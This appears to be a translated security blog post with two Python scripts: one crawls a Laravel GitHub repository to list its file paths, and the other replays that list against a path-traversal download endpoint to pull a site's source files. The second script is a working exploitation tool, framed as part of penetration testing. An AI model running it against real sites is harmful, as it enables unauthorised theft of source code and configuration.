Crawler: Crawling a GitHub Project's File Structure, and Downloading and Storing Files via Arbitrary File Download

Posted 2021-12-09 南瓜__pumpkin

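Scenario

Requirement: after discovering an arbitrary file download vulnerability, you may need to download the source code for a code audit.

Problem: Burp Suite intercepts HTTP/HTTPS traffic, but its Intruder module cannot be used to download files from a dictionary of file paths.

Inspiration: when I first ran into this problem, I downloaded the files by visiting each path manually. Two days ago I watched an internal sharing video by @L4ml3da that covered selenium. I wrote about a thousand lines of selenium code back in 2019, so it occurred to me that selenium could automate tasks such as login interface brute-forcing and arbitrary file download. (At the very least it got me thinking about automation, which lays a solid foundation for being lazy later.)

In practice: plain Python can handle both login interface brute-forcing and arbitrary file download, and for arbitrary file download all you need to do is save the returned data. Python is great; there is no need for the selenium module.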

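Crawling the file structure of a GitHub project

Crawling the Laravel 8.x file structure

I found a Laravel 8.x project on GitHub. How do you get its file structure? I suggest writing a crawler script: free up your hands and make your dreams come true!

Writing the script

Python crawlers that access GitHub often run into connection timeout or read timeout errors.

Connection timeouts when accessing GitHub

Open Notepad as administrator, open the file C:\Windows\System32\drivers\etc\hosts, and add the following host entries: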

192.30.255.112  github.com git 
185.31.16.184 github.global.ssl.fastly.net

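requests read timeouts

import requests
from requests.adapters import HTTPAdapter

url = "https://github.com/laravel/laravel"

# Retry up to 3 times
s = requests.Session()
s.mount('http://', HTTPAdapter(max_retries=3))
s.mount('https://', HTTPAdapter(max_retries=3))

# timeout=(connect, read): 5 s to connect, 20 s to wait for the server's response data
resp = s.get(url, timeout=(5, 20))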

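GitHub has an anti-crawling mechanism. Judging from my experiments, it seems to answer only one request within a certain period of time, and setting a random User-Agent makes no difference.

I planned to route requests through a local proxy via proxies and switch IPs manually, but I could not connect to the proxy port, and this would only be a stopgap anyway.

For now I just wait patiently: crawl once, then wait a minute. (Note: connections through a proxy are very smooth.)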
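The "crawl once, wait a minute" routine can be sketched as a small helper. This is only a minimal sketch: the `Throttle` class, its `min_interval` parameter, and the injectable `clock` and `sleep` arguments are names made up for illustration, and the 60-second default is simply the waiting time mentioned above, not a documented GitHub limit.

```python
import time


class Throttle:
    """Enforce a minimum interval between consecutive requests (hypothetical helper)."""

    def __init__(self, min_interval=60.0, clock=time.monotonic, sleep=time.sleep):
        self.min_interval = min_interval
        self._clock = clock      # injectable so the logic can be tested without waiting
        self._sleep = sleep
        self._last = None        # time of the previous request, None before the first one

    def wait(self):
        """Block until at least min_interval seconds have passed since the last call."""
        now = self._clock()
        if self._last is not None:
            remaining = self.min_interval - (now - self._last)
            if remaining > 0:
                self._sleep(remaining)
                now = self._clock()
        self._last = now


# Tiny interval here so the demo finishes immediately; the post waits about a minute.
throttle = Throttle(min_interval=0.01)
for page in ["page-1", "page-2", "page-3"]:
    throttle.wait()              # the first call returns at once, later calls pause
    print("would request", page)
```

Calling `throttle.wait()` right before each `s.get(...)` would space the requests at least `min_interval` seconds apart, without sleeping longer than necessary when parsing already took some time.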

Crawler script

Spider_Github_FileStructure.py

# -*- coding: utf-8 -*-

import requests
from requests.adapters import HTTPAdapter
from bs4 import BeautifulSoup

"""Avoid italics and bold in the comments"""
"""
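@ ToDo:   Crawl the file structure of the GitHub project
@ author: pump
@ date: 2021/11/05
@ Adaptability
    Problem 1: crawling laravel 5.7
        The usual project root paths are https://github.com/laravel/laravel/tree/5.7 and https://github.com/laravel/laravel/tree/8.x (the example uses the default page)
        Correction: change the project root URL; the prefix and suffix handling adapts and needs no changes
@ Approach:
    Raw data obtained from a page: a pile of hyperlinks.
    Filter the raw data: by path.
    Process the data: if it is a directory, descend one level. If it is a file, save its path.

    For the second level, call the same method again. The prefix must be extended to avoid crawling the same page repeatedly, but it must not be extended in place, otherwise the crawl cannot backtrack to the root directory and continue.

@ GitHub project path information:
    Directory paths: https://github.com/laravel/laravel/tree/8.x/ (directories all live under /tree/)
    File paths: https://github.com/laravel/laravel/blob/8.x/ (files all live under /blob/)
    Note: it is not yet confirmed whether every GitHub project uses the /tree/ and /blob/ paths to store files

@ Algorithm steps:
    Visit the project root page and split the hyperlinks into three kinds: irrelevant, directory, file
    @@@ First level
    (1) Irrelevant: filter out
    (2) File: write to the result file. Criterion: has the prefix /blob/8.x/
    (3) Directory: visit recursively, level by level. Criterion: has the prefix /tree/8.x/

    Recursive directory traversal:
        @@@ Second level
            For example, if the hyperlink's relative path is /laravel/laravel/tree/8.x/app, the prefix at that point is /laravel/laravel/tree/8.x/,
    so the url and both prefixes must be updated for the next call. Here url = urlRoot + href
        (1) Update url: to build the url, cut "app" out of the hyperlink and call it the suffix: tail = href[len(directoryPre):] = "app"
        (2) Update the directory prefix: directoryPre + tail
        (3) Update the file prefix: filePre + tail
        @@@ Correction 1
            Error: the prefix values must not be modified in place, because later calls can then no longer restore them. For example, filtering the project root with the prefix /xx/app returns nothing
            Fix: add tail when passing the arguments, without changing the variables themselves

        @@@ Correction 2
            Error: the directory prefix was missing when saving file names
            Fix: keep the initial prefix in a separate variable and strip only that initial prefix

        @@@ Saving results
            Requirement: clear the .txt file every time the script starts.
            Constraint: the open mode in write_path() cannot be changed to w, because the file is opened once per recursive call
            Solution: define a separate clearing function that writes "" at startup

        @@@ Access notes
            With proxy software running in system proxy mode, requests to GitHub almost never failed; very smooth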
"""

"""
Functions
    class::__init__(urlRoot, url, dicFilename, directoryPre, filePre)  initialize variables / configuration

    class::write_path(filename, fileList)  write file paths to the result file

    class::write_flush(filename)  clear the result file that stores the file paths

    class::crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre, filePre)  recursively crawl directories and write file paths to the result file

Parameters
    dicFilename = "projectStructure/laravel/laravel_8.x_fileStructure.txt"   variable: file that stores the results
    urlRoot = "https://github.com"                  constant
    url = "https://github.com/laravel/laravel/"     variable: project root URL
    directoryPre = "/tree/8.x/"                     variable: path under which the project's directories are stored
    filePre = "/blob/8.x/"                          variable: path under which the project's files are stored

Class usage
    crawl = CrawlGithub(urlRoot, url, dicFilename, directoryPre, filePre)
    
    crawl.write_flush(dicFilename)
    crawl.crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre, filePre)

Effective code: roughly 64 lines
Sample results: see the end of the file
"""


class CrawlGithub:

    def __init__(self, urlRoot, url, dicFilename, directoryPre, filePre):
        self.urlRoot = urlRoot
        self.url = url
        self.dicFilename = dicFilename
        self.directoryPre = directoryPre
        self.filePre = filePre
        # Keep the initial prefixes so saved paths stay relative to the project root
        self.initDirectoryPre = directoryPre
        self.initFilePre = filePre

    def write_path(self, filename, fileList):
        # Append mode, because this is called once per crawled directory
        with open(filename, 'a+') as f:
            for file in fileList:
                f.write(file + "\n")

    def write_flush(self, filename):
        # Truncate the result file when the script starts
        with open(filename, 'w') as f:
            f.write("")

    def crawl_github_file_structure(self, urlRoot, url, dicFilename, directoryPre, filePre):
        try:
            # Retry up to 3 times
            s = requests.Session()
            s.mount('http://', HTTPAdapter(max_retries=3))
            s.mount('https://', HTTPAdapter(max_retries=3))
            resp = s.get(url, timeout=(5, 20))
            print("Request succeeded")

            fileList = []
            soup = BeautifulSoup(resp.text, "lxml")
            list_a = soup.find_all('a')
            for a in list_a:
                href = a.get('href')
                if not href:    # <a> tags without an href would break the "in" checks below
                    continue
                print(href)

                # A whitelist is enough: directory prefix /tree/8.x/, file prefix /blob/8.x/
                if directoryPre in href:    # directory
                    url = urlRoot + href   # next page to visit
                    # Part of the path after the current prefix, e.g. "app"
                    # (replaces the hard-coded 16, the length of "/laravel/laravel")
                    tail = href[href.find(directoryPre) + len(directoryPre):]
                    print(url)
                    self.crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre + tail, filePre + tail)

                if filePre in href:    # file
                    href = href[href.find(self.initFilePre) + len(self.initFilePre):]
                    fileList.append(href)
            self.write_path(dicFilename, fileList)

        except requests.exceptions.ConnectTimeout:
            print("Connection timed out")
        except requests.exceptions.ReadTimeout:
            print("Read timed out")

if __name__ == "__main__":
    dicFilename = "projectStructure/laravel/laravel_5.7_fileStructure.txt"
    urlRoot = "https://github.com"
    url = "https://github.com/laravel/laravel/tree/5.7"
    directoryPre = "/tree/5.7/"
    filePre = "/blob/5.7/"

    crawl = CrawlGithub(urlRoot, url, dicFilename, directoryPre, filePre)

    crawl.write_flush(dicFilename)
    crawl.crawl_github_file_structure(urlRoot, url, dicFilename, directoryPre, filePre)

'''
@@@ Sample results
app/Console/Kernel.php
app/Exceptions/Handler.php
app/Http/Controllers/Controller.php
app/Http/Middleware/Authenticate.php
app/Http/Middleware/EncryptCookies.php
app/Http/Middleware/PreventRequestsDuringMaintenance.php
app/Http/Middleware/RedirectIfAuthenticated.php
app/Http/Middleware/TrimStrings.php
app/Http/Middleware/TrustHosts.php
app/Http/Middleware/TrustProxies.php
app/Http/Middleware/VerifyCsrfToken.php
app/Http/Kernel.php
app/Models/User.php
app/Providers/AppServiceProvider.php
app/Providers/AuthServiceProvider.php
app/Providers/BroadcastServiceProvider.php
app/Providers/EventServiceProvider.php
app/Providers/RouteServiceProvider.php
bootstrap/cache/.gitignore
bootstrap/app.php
config/app.php
config/auth.php
config/broadcasting.php
config/cache.php
config/cors.php
config/database.php
config/filesystems.php
config/hashing.php
config/logging.php
config/mail.php
config/queue.php
config/sanctum.php
config/services.php
config/session.php
config/view.php
database/factories/UserFactory.php
database/migrations/2014_10_12_000000_create_users_table.php
database/migrations/2014_10_12_100000_create_password_resets_table.php
database/migrations/2019_08_19_000000_create_failed_jobs_table.php
database/migrations/2019_12_14_000001_create_personal_access_tokens_table.php
database/seeders/DatabaseSeeder.php
database/.gitignore
public/.htaccess
public/favicon.ico
public/index.php
public/robots.txt
public/web.config
resources/css/app.css
resources/js/app.js
resources/js/bootstrap.js
resources/lang/en/auth.php
resources/lang/en/pagination.php
resources/lang/en/passwords.php
resources/lang/en/validation.php
resources/views/welcome.blade.php
routes/api.php
routes/channels.php
routes/console.php
routes/web.php
storage/app/public/.gitignore
storage/app/.gitignore
storage/framework/cache/data/.gitignore
storage/framework/cache/.gitignore
storage/framework/sessions/.gitignore
storage/framework/testing/.gitignore
storage/framework/views/.gitignore
storage/framework/.gitignore
storage/logs/.gitignore
tests/Feature/ExampleTest.php
tests/Unit/ExampleTest.php
tests/CreatesApplication.php
tests/TestCase.php
.editorconfig
.env.example
.gitattributes
.gitignore
.styleci.yml
CHANGELOG.md
README.md
artisan
composer.json
package.json
phpunit.xml
server.php
webpack.mix.js
'''
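The link-classification step from the script's notes (irrelevant, directory, file) can also be tried offline, without touching GitHub. The following is a minimal sketch using only the standard library's `html.parser` instead of BeautifulSoup; `LinkCollector`, `classify_links`, and the `sample_html` snippet are made up for illustration, and real GitHub pages may be structured differently.

```python
from html.parser import HTMLParser


class LinkCollector(HTMLParser):
    """Collect the href value of every <a> tag in an HTML page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:                      # skip anchors that have no href
                self.hrefs.append(href)


def classify_links(html, directory_pre, file_pre):
    """Split a page's links into directory paths and file paths.

    A link counts as a directory or file when it contains the matching
    prefix; everything else is ignored. Returned paths are relative to
    the prefix.
    """
    collector = LinkCollector()
    collector.feed(html)
    directories, files = [], []
    for href in collector.hrefs:
        if directory_pre in href:
            directories.append(href[href.find(directory_pre) + len(directory_pre):])
        elif file_pre in href:
            files.append(href[href.find(file_pre) + len(file_pre):])
    return directories, files


# Hypothetical page fragment, only for demonstration.
sample_html = """
<a href="/laravel/laravel/tree/8.x/app">app</a>
<a href="/laravel/laravel/blob/8.x/artisan">artisan</a>
<a href="/laravel/laravel/blob/8.x/README.md">README.md</a>
<a href="/login">Sign in</a>
<a name="top">no href</a>
"""
directories, files = classify_links(sample_html, "/tree/8.x/", "/blob/8.x/")
print(directories)  # ['app']
print(files)        # ['artisan', 'README.md']
```

Each entry in `directories` is what the script calls `tail`: the crawler would visit that page next with the prefixes extended by it, while the entries in `files` go straight into the result file.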

Arbitrary file download script

File_Arbitraty_Download.py

# -*- coding: utf-8 -*-

import requests
from requests.adapters import HTTPAdapter
import os


"""
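@ The script has three steps, one function each:
        Read the dictionary: read the {path dictionary file} under the projectDicts directory line by line and return a list
        Request the file: request the site with each path and decide by status code (200) whether to save the file
        Save the file: save it under the projectFiles directory

@ Checking whether a file exists: by status code; in this example the status code is 200


@ Debugging
    Error: open("", 'w') fails to create a file inside nested directories, e.g. [Errno 2] No such file or directory: 'projectFiles/xxx/app/Exceptions/Handler.php'
    Cause: open() cannot create directories
    Fix: use os.makedirs() from the os library to create directories recursively, using str.rfind() to find the last / and cut out the directory part
    
    Error: the downloaded file content was wrong
    Fix: the cause was the way the parameter was passed; a GET parameter returns 200, while a POST parameter fails with 405
    
@ Saving data
    File content to save: resp.content
    Content format: resp.content is bytes, i.e. b'xxxxxx'. Calling str(b, encoding = "utf8") fixes the layout problem directly

@ Note: laravel controllers live under app/Http/Controllers/ (the web root itself is public/); sample page: /Student/Title/BookController.php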
"""


class FileArbitraryDownload:

    def __init__(self, url, dictName, projectName):

        self.url = url
        self.dictName = 'projectDicts/' + dictName
        self.projectPath = "projectFiles/" + projectName    # folder where downloaded files are saved

    def read_dict(self):
        with open(self.dictName, 'r') as f:
            # One path per line; skip blank lines such as a trailing empty one
            path_list = [line.strip() for line in f if line.strip()]
        return path_list

    def download(self):

        # Retry up to 3 times
        s = requests.Session()
        s.mount('http://', HTTPAdapter(max_retries=3))
        s.mount('https://', HTTPAdapter(max_retries=3))

        # proxies = {
        #     "http": "http://127.0.0.1:8080",
        #     "https": "https://127.0.0.1:8080"
        # }
        # Read the dictionary
        path_list = self.read_dict()
        for path in path_list:
            try:
                print(self.url + path)
                resp = s.get(self.url + path, timeout=5)
                print(resp.status_code)
                if resp.status_code == 200:
                    self.store_file(path, resp.content)
            except Exception as e:
                print(e)

    def store_file(self, path, file_content):
        file_path = self.projectPath + path
        # open() cannot create missing directories, so create them first
        os.makedirs(file_path[:file_path.rfind("/")], exist_ok=True)
        try:
            # In text mode write() needs str, not bytes, so decode the body first
            text = str(file_content, encoding="utf-8")
            with open(file_path, 'w', encoding="utf-8") as f:
                f.write(text)
        except UnicodeDecodeError:
            # Binary files such as favicon.ico cannot be decoded; save the raw bytes
            with open(file_path, 'wb') as f:
                f.write(file_content)


if __name__ == '__main__':
    url = "http://xxx/download?path=/../"
    dictName = "laravel/laravel_5.7_fileStructure.txt"
    projectName = 'xx_site_source/'

    crawlDownload = FileArbitraryDownload(url, dictName, projectName)

    crawlDownload.download()
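The directory-creation fix from the debugging notes can be tried in isolation. Below is a minimal sketch, not the class method itself: this standalone `store_file(base_dir, rel_path, content)` helper and the temporary directory are assumptions for illustration, and it writes the raw bytes in binary mode, which is one possible way to sidestep the str/bytes issue.

```python
import os
import tempfile


def store_file(base_dir, rel_path, content):
    """Write bytes to base_dir/rel_path, creating parent directories first."""
    file_path = os.path.join(base_dir, *rel_path.split("/"))
    # open() does not create missing directories, so create them up front.
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    # Binary mode stores the response body unchanged, whether it is text or not.
    with open(file_path, "wb") as f:
        f.write(content)
    return file_path


# Demo in a throwaway directory so nothing is left behind.
with tempfile.TemporaryDirectory() as base:
    saved = store_file(base, "app/Exceptions/Handler.php", b"<?php\n")
    with open(saved, "rb") as f:
        print(f.read())  # b'<?php\n'
```

With `exist_ok=True` there is no need to check `os.path.exists()` first, and calling the helper again for another file in the same directory does not raise an error.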
